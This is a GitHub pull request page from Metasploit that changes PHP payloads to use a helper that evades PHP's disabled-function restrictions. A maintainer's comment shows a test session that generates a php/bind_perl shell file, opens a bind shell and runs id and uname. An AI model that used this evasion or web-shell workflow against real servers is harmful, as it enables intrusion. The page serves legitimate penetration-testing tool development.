Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Use php_preamble/php_system_block instead of system in payloads/singles/php/ #19466

Merged
merged 4 commits into from
Sep 27, 2024
Merged

Use php_preamble/php_system_block instead of system in payloads/singles/php/ #19466

merged 4 commits into from
Sep 27, 2024

Conversation

jvoisin
Copy link
Contributor

@jvoisin jvoisin commented Sep 17, 2024

The php_preamble/php_system_block combo has builtin low-hanging evasion for PHP's disabled_functions configuration (eg. system might not be available but shell_exec is), so use it instead of hardcoding system.

This commit also brings modules/payloads/singles/php/reverse_perl.rb's style more in line with the other uses of php_preamble/php_system_block.

@jvoisin jvoisin force-pushed the singles_php branch 2 times, most recently from 016e0d0 to 47cbf14 Compare September 18, 2024 10:36
@jvoisin @Chocapikk
Use php_preamble/php_system_block instead of system in payloads/sin…
b7fff59 
…gles/php/

The `php_preamble`/`php_system_block` combo has builtin low-hanging evasion for
PHP's `disabled_functions` configuration (eg. `system` might not be available
but `shell_exec` is), so use it instead of hardcoding `system`.

This commit also brings modules/payloads/singles/php/reverse_perl.rb's style
more in line with the other uses of `php_preamble`/`php_system_block`.

Oh, and it makes lib/msf/core/payload/php.rb work on older Ruby version as
well.

Co-authored-by: Valentin Lobstein <[email protected]>
@jheysel-r7 jheysel-r7 self-assigned this Sep 25, 2024
@jheysel-r7
Copy link
Contributor

The changes here look good (I just landed the related WordPress specific PR) although the CI test failures are legit.

We have a number of unit tests that run for our different payloads that verify the CachedSize are as expected. When we update the CachedSize of a payload have to update the unit tests as well. Apologies my first attempt to fix didn't work, I'll get back to you tomorrow on this.

@jheysel-r7
Copy link
Contributor

I fixed the unit tests, tested the php/bind_perl payload and it's working as expected. Thanks for the enhancement!

msf6 payload(php/bind_perl) > to_handler
[*] Payload Handler Started as Job 0

[*] Started bind TCP handler against 172.16.199.158:4444
msf6 payload(php/bind_perl) >
msf6 payload(php/bind_perl) > generate -o shell.php -f raw
[*] Writing 2049 bytes to shell.php...
msf6 payload(php/bind_perl) > [*] Command shell session 1 opened (172.16.199.158:33675 -> 172.16.199.158:4444) at 2024-09-26 16:22:53 -0800
msf6 payload(php/bind_perl) >
msf6 payload(php/bind_perl) > sessions -i -1
[*] Starting interaction with 1...

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),132(lxd),133(sambashare),998(docker),1001(rvm)
sysinfo
uname -a
Linux ubuntu 5.15.0-92-generic #102~20.04.1-Ubuntu SMP Mon Jan 15 13:09:14 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

@jheysel-r7 jheysel-r7 merged commit 94c1939 into rapid7:master Sep 27, 2024
67 checks passed
@jheysel-r7 jheysel-r7 added the rn-enhancement release notes enhancement label Oct 2, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@Chocapikk Chocapikk Chocapikk left review comments

@jheysel-r7 jheysel-r7 jheysel-r7 approved these changes

Assignees

@jheysel-r7 jheysel-r7

Labels
enhancement rn-enhancement release notes enhancement
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@jvoisin @jheysel-r7 @Chocapikk